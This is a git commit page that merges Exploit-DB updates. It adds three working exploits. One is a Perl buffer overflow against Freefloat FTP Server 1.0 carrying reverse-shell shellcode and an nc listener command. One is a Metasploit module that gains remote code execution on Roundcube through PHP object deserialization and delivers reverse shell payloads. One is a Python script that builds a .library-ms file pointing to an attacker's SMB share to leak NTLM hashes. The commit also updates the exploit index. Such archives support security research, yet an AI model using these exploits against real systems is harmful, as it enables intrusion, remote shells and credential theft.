Merge remote-tracking branch 'exploitdb/main'

This commit is contained in:
Brendan McDevitt 2025-06-15 00:02:13 +00:00
commit c3a7d70fa1
5 changed files with 362 additions and 2 deletions

View file

@ -0,0 +1,85 @@
# Exploit Title: Freefloat FTP Server 1.0 - Remote Buffer Overflow
# Date: 22 may 2025
# Notification vendor: No reported
# Discovery by: Fernando Mengali
# LinkedIn: https://www.linkedin.com/in/fernando-mengali-273504142/
# Version: 1.0
# Tested on: Windows XP SP3 English - # Version 5.1 (Build 2600.xpsp.080413-2111 : Service Pack 3)
# Vulnerability Type: Remote Buffer Overflow
# CVE: CVE-2025-5548
#offset: 246
#badchars: \x00\x0a\x0d
#EIP: 0x7C86467B (JMP ESP)
#Kernel32.dll
use IO::Socket::INET;
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.232.129 lport=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
# nc -vlp 4444
# execute exploit
my $buf =
"\xda\xd4\xbb\x4e\xd9\xfd\x96\xd9\x74\x24\xf4\x58\x2b\xc9" .
"\xb1\x52\x31\x58\x17\x83\xc0\x04\x03\x16\xca\x1f\x63\x5a" .
"\x04\x5d\x8c\xa2\xd5\x02\x04\x47\xe4\x02\x72\x0c\x57\xb3" .
"\xf0\x40\x54\x38\x54\x70\xef\x4c\x71\x77\x58\xfa\xa7\xb6" .
"\x59\x57\x9b\xd9\xd9\xaa\xc8\x39\xe3\x64\x1d\x38\x24\x98" .
"\xec\x68\xfd\xd6\x43\x9c\x8a\xa3\x5f\x17\xc0\x22\xd8\xc4" .
"\x91\x45\xc9\x5b\xa9\x1f\xc9\x5a\x7e\x14\x40\x44\x63\x11" .
"\x1a\xff\x57\xed\x9d\x29\xa6\x0e\x31\x14\x06\xfd\x4b\x51" .
"\xa1\x1e\x3e\xab\xd1\xa3\x39\x68\xab\x7f\xcf\x6a\x0b\x0b" .
"\x77\x56\xad\xd8\xee\x1d\xa1\x95\x65\x79\xa6\x28\xa9\xf2" .
"\xd2\xa1\x4c\xd4\x52\xf1\x6a\xf0\x3f\xa1\x13\xa1\xe5\x04" .
"\x2b\xb1\x45\xf8\x89\xba\x68\xed\xa3\xe1\xe4\xc2\x89\x19" .
"\xf5\x4c\x99\x6a\xc7\xd3\x31\xe4\x6b\x9b\x9f\xf3\x8c\xb6" .
"\x58\x6b\x73\x39\x99\xa2\xb0\x6d\xc9\xdc\x11\x0e\x82\x1c" .
"\x9d\xdb\x05\x4c\x31\xb4\xe5\x3c\xf1\x64\x8e\x56\xfe\x5b" .
"\xae\x59\xd4\xf3\x45\xa0\xbf\x3b\x31\x42\xbe\xd4\x40\x92" .
"\xd0\x78\xcc\x74\xb8\x90\x98\x2f\x55\x08\x81\xbb\xc4\xd5" .
"\x1f\xc6\xc7\x5e\xac\x37\x89\x96\xd9\x2b\x7e\x57\x94\x11" .
"\x29\x68\x02\x3d\xb5\xfb\xc9\xbd\xb0\xe7\x45\xea\x95\xd6" .
"\x9f\x7e\x08\x40\x36\x9c\xd1\x14\x71\x24\x0e\xe5\x7c\xa5" .
"\xc3\x51\x5b\xb5\x1d\x59\xe7\xe1\xf1\x0c\xb1\x5f\xb4\xe6" .
"\x73\x09\x6e\x54\xda\xdd\xf7\x84\x1f\xd2\x90\x6e\x70\xeb" .
"\x82\x52\x75\x11\x7b\x02\x0c\x9f\x7b\x6c\x48\x37\x2a\x59" .
"\x07\x94\x51\xcc\xde\xc5\x30\x84\x22\x97\x58\x0e\x12\x72" .
"\x5a\x1a\x4b\x9a\x5a\x7c\x4e\x04\x2e\x14\x48\xbc\x67\x9b" .
"\x9d\x6c\xa9\x79\x0f\x4f\x08\xbd\x2e\xec\xaa\x45\x64\x09" .
"\xe2\x98\x56\x62\xde\x65\xf2\x48\x4e\xec\x79\x1b\x4c\x9d" .
"\xa5\xda\x47\xd3\xa5\x53\xa3\xaa\x52\x11\x25\xdb\x6a\x62" .
"\xc3\x5a\x3a\x90\xab\x70\x4e\x74\x4a\x12\xae\x53\x54\xda" .
"\x38\x90\x70\x58\x98\xac\x2b\xdb\x7c\x48\x5f\x1e\x4a\x4a" .
"\x1e\x84\x28";
my $offset = 246; # Será substituído depois
my $eip = pack('V', 0x7c86467b); # Endereço JMP ESP little endian
my $nop = "\x90" x 20;
my $padding = "A" x $offset;
my $payload = $padding . $eip . $nop . $buf;
my $socket = IO::Socket::INET->new(
PeerAddr => '192.168.232.135',
PeerPort => '21',
Proto => 'tcp'
) or die "Failed to connect: $!\n";
print "Connected to FTP server\n";
my $response = "";
$response = <$socket>; # banner inicial do FTP
print $socket "USER anonymous\r\n";
$response = <$socket>;
print $socket "PASS anonymous\r\n";
$response = <$socket>;
print $socket "NOOP $payload\r\n";
$response = <$socket>;
print "Payload sent, check your listener.\n";
close $socket;

View file

@ -0,0 +1,238 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization',
'Description' => %q{
Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution
by authenticated users because the _from parameter in a URL is not validated
in program/actions/settings/upload.php, leading to PHP Object Deserialization.
An attacker can execute arbitrary system commands as the web server.
},
'Author' => [
'Maksim Rogov', # msf module
'Kirill Firsov', # disclosure and original exploit
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-49113'],
['URL', 'https://fearsoff.org/research/roundcube']
],
'DisclosureDate' => '2025-06-02',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]
},
'Platform' => ['unix', 'linux'],
'Targets' => [
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64],
'Type' => :linux_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
[
'Linux Command',
{
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Type' => :nix_cmd,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
]
],
'DefaultTarget' => 0
)
)
register_options(
[
OptString.new('USERNAME', [true, 'Email User to login with', '' ]),
OptString.new('PASSWORD', [true, 'Password to login with', '' ]),
OptString.new('TARGETURI', [true, 'The URI of the Roundcube Application', '/' ]),
OptString.new('HOST', [false, 'The hostname of Roundcube server', ''])
]
)
end
class PhpPayloadBuilder
def initialize(command)
@encoded = Rex::Text.encode_base32(command)
@gpgconf = %(echo "#{@encoded}"|base32 -d|sh &#)
end
def build
len = @gpgconf.bytesize
%(|O:16:"Crypt_GPG_Engine":3:{s:8:"_process";b:0;s:8:"_gpgconf";s:#{len}:"#{@gpgconf}";s:8:"_homedir";s:0:"";};)
end
end
def fetch_login_page
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'keep_cookies' => true,
'vars_get' => { '_task' => 'login' }
)
fail_with(Failure::Unreachable, "#{peer} - No response from web service") unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code #{res.code}") unless res.code == 200
res
end
def check
res = fetch_login_page
unless res.body =~ /"rcversion"\s*:\s*(\d+)/
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract version number")
end
version = Rex::Version.new(Regexp.last_match(1).to_s)
print_good("Extracted version: #{version}")
if version.between?(Rex::Version.new(10100), Rex::Version.new(10509))
return CheckCode::Appears
elsif version.between?(Rex::Version.new(10600), Rex::Version.new(10610))
return CheckCode::Appears
end
CheckCode::Safe
end
def build_serialized_payload
print_status('Preparing payload...')
stager = case target['Type']
when :nix_cmd
payload.encoded
when :linux_dropper
generate_cmdstager.join(';')
else
fail_with(Failure::BadConfig, 'Unsupported target type')
end
serialized = PhpPayloadBuilder.new(stager).build.gsub('"', '\\"')
print_good('Payload successfully generated and serialized.')
serialized
end
def exploit
token = fetch_csrf_token
login(token)
payload_serialized = build_serialized_payload
upload_payload(payload_serialized)
end
def fetch_csrf_token
print_status('Fetching CSRF token...')
res = fetch_login_page
html = res.get_html_document
token_input = html.at('input[name="_token"]')
unless token_input
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract CSRF token")
end
token = token_input.attributes.fetch('value', nil)
if token.blank?
fail_with(Failure::UnexpectedReply, "#{peer} - CSRF token is empty")
end
print_good("Extracted token: #{token}")
token
end
def login(token)
print_status('Attempting login...')
vars_post = {
'_token' => token,
'_task' => 'login',
'_action' => 'login',
'_url' => '_task=login',
'_user' => datastore['USERNAME'],
'_pass' => datastore['PASSWORD']
}
vars_post['_host'] = datastore['HOST'] if datastore['HOST']
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'POST',
'keep_cookies' => true,
'vars_post' => vars_post,
'vars_get' => { '_task' => 'login' }
)
fail_with(Failure::Unreachable, "#{peer} - No response during login") unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Login failed (code #{res.code})") unless res.code == 302
print_good('Login successful.')
end
def generate_from
options = [
'compose',
'reply',
'import',
'settings',
'folders',
'identity'
]
options.sample
end
def generate_id
random_data = SecureRandom.random_bytes(8)
timestamp = Time.now.to_f.to_s
Digest::MD5.hexdigest(random_data + timestamp)
end
def generate_uploadid
millis = (Time.now.to_f * 1000).to_i
"upload#{millis}"
end
def upload_payload(payload_filename)
print_status('Uploading malicious payload...')
# 1x1 transparent pixel image
png_data = Rex::Text.decode_base64('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==')
boundary = Rex::Text.rand_text_alphanumeric(8)
data = ''
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"_file[]\"; filename=\"#{payload_filename}\"\r\n"
data << "Content-Type: image/png\r\n\r\n"
data << png_data
data << "\r\n--#{boundary}--\r\n"
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "?_task=settings&_remote=1&_from=edit-!#{generate_from}&_id=#{generate_id}&_uploadid=#{generate_uploadid}&_action=upload"),
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => data
})
print_good('Exploit attempt complete. Check for session.')
end
end

View file

View file

@ -0,0 +1,34 @@
import os
import tarfile
def main():
file_name = input("Enter your file name: ")
ip_address = input("Enter IP (EX: 192.168.1.162): ")
library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{ip_address}\\IT</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""
library_file_name = f"{file_name}.library-ms"
with open(library_file_name, "w", encoding="utf-8") as f:
f.write(library_content)
tar_name = "exploit.tar"
with tarfile.open(tar_name, "w") as tarf:
tarf.add(library_file_name)
if os.path.exists(library_file_name):
os.remove(library_file_name)
print("completed")
if __name__ == "__main__":
main()

View file

@ -10942,6 +10942,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info
39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info
52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,,
52323,exploits/multiple/remote/52323.txt,"Freefloat FTP Server 1.0 - Remote Buffer Overflow",2025-06-13,"Fernando Mengali",remote,multiple,,2025-06-13,2025-06-13,0,CVE-2025-5548,,,,,
23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info
29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,remote,multiple,,2007-04-20,2013-11-28,1,CVE-2007-2191;OSVDB-35315,,,,,https://www.securityfocus.com/bid/23575/info
47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb
@ -12341,6 +12342,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,,2019-06-17,2019-06-17,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
52081,exploits/multiple/webapps/52081.txt,"reNgine 2.2.0 - Command Injection (Authenticated)",2024-10-01,"Caner Tercan",webapps,multiple,,2024-10-01,2024-10-01,0,,,,,,
18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple,,2012-03-03,2012-03-16,0,OSVDB-85702;OSVDB-79806;CVE-2012-4996;CVE-2012-4993;OSVDB-79805,,,,http://www.exploit-db.comrivettracker_1-03.zip,
52324,exploits/multiple/webapps/52324.NA,"Roundcube 1.6.10 - Remote Code Execution (RCE)",2025-06-13,"Maksim Rogov",webapps,multiple,,2025-06-13,2025-06-13,0,CVE-2025-49113,,,,,
52127,exploits/multiple/webapps/52127.py,"Royal Elementor Addons and Templates 1.3.78 - Unauthenticated Arbitrary File Upload",2025-04-05,4m3rr0r,webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2023-5360,,,,,
11405,exploits/multiple/webapps/11405.txt,"RSA - SecurID Cross-Site Scripting",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,OSVDB-43844;CVE-2008-1470,,,,,
48639,exploits/multiple/webapps/48639.txt,"RSA IG&L Aveksa 7.1.1 - Remote Code Execution",2020-07-06,"Jakub Palaczynski",webapps,multiple,,2020-07-06,2020-07-06,0,CVE-2019-3759,,,,,
@ -14236,7 +14238,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,,
5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip,
48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,,
52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-37732,,,,,
52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-06-13,0,CVE-2024-37732,,,,,
37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info
26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip,
27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info
@ -45191,7 +45193,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40680,exploits/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Remote Buffer Overflow",2016-11-02,Eagleblack,remote,windows,,2016-11-02,2016-11-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-02-at-135629.png,http://www.exploit-db.comPCMan.7z,
38340,exploits/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal",2015-09-28,"Jay Turla",remote,windows,21,2015-09-28,2015-09-28,0,CVE-2015-7601;OSVDB-128191,,,,http://www.exploit-db.comPCMan.7z,
27007,exploits/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote (Metasploit)",2013-07-22,MSJ,remote,windows,21,2013-07-22,2013-07-22,1,OSVDB-94624;CVE-2013-4730,"Metasploit Framework (MSF)",,,http://www.exploit-db.comPCMan.7z,
26471,exploits/windows/remote/26471.py,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21,2013-06-27,2013-06-29,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
26471,exploits/windows/remote/26471.NA,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21,2013-06-27,2025-06-13,0,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
27277,exploits/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow",2013-08-02,Ottomatik,remote,windows,,2013-08-02,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-08-at-34942-pm.png,http://www.exploit-db.comPCMan.7z,
@ -45956,6 +45958,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
52325,exploits/windows/remote/52325.py,"Windows File Explorer Windows 10 Pro x64 - TAR Extraction",2025-06-13,"Daniel Miranda",remote,windows,,2025-06-13,2025-06-13,0,CVE-2025-24071,,,,,
52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,
30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info
16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,,

Can't render this file because it is too large.